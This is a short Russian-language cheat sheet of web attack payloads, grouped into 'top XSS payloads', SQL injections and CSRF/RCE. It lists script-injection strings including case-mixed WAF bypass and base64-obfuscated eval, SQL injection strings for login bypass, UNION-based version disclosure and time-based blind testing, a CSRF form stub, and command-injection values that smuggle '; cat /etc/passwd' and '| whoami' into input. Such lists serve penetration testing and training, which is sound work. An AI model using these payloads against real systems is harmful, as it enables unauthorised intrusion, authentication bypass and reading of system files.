01 // ТОП XSS ПЕЙЛОАДОВ
Базовый тест
<script>alert(1)</script>
Ошибка изображения
<img src=x onerror=alert(1)>
SVG Загрузка
<svg onload=alert(1)>
Выход из тега
"><script>alert(1)</script>
Протокол JS
javascript:alert(1)
Инъекция атрибута
' onmouseover='alert(1)
Автозагрузка Body
<body onload=alert(1)>
Обертка Iframe
<iframe src="javascript:alert(1)">
Обход регистра WAF
<ScRiPt>alert(1)</sCrIpT>
Закрытие тега
</script><script>alert(1)</script>
HTML5 Data трюк
dataset/x" onclick="alert(1)
Обфускация Base64
eval(atob('YWxlcnQoMSk='))
Гибридный вектор
"><img src=x onerror=prompt(1)>
Триггер автофокуса
<input onfocus=alert(1) autofocus>
Ловушка Details
<details open ontoggle=alert(1)>
02 // SQL ИНЪЕКЦИИ
Обход авторизации
' OR '1'='1
Трюк с комментарием
admin' --
Тест Union Select
' UNION SELECT 1,version(),3--
Слепая (Time Based)
' AND (SELECT SLEEP(5))--
03 // CSRF / RCE
Базовая CSRF форма
<form action="http://target/api" method="POST">...</form>
Разделитель команд (RCE)
; cat /etc/passwd
Пайп инъекция (RCE)
| whoami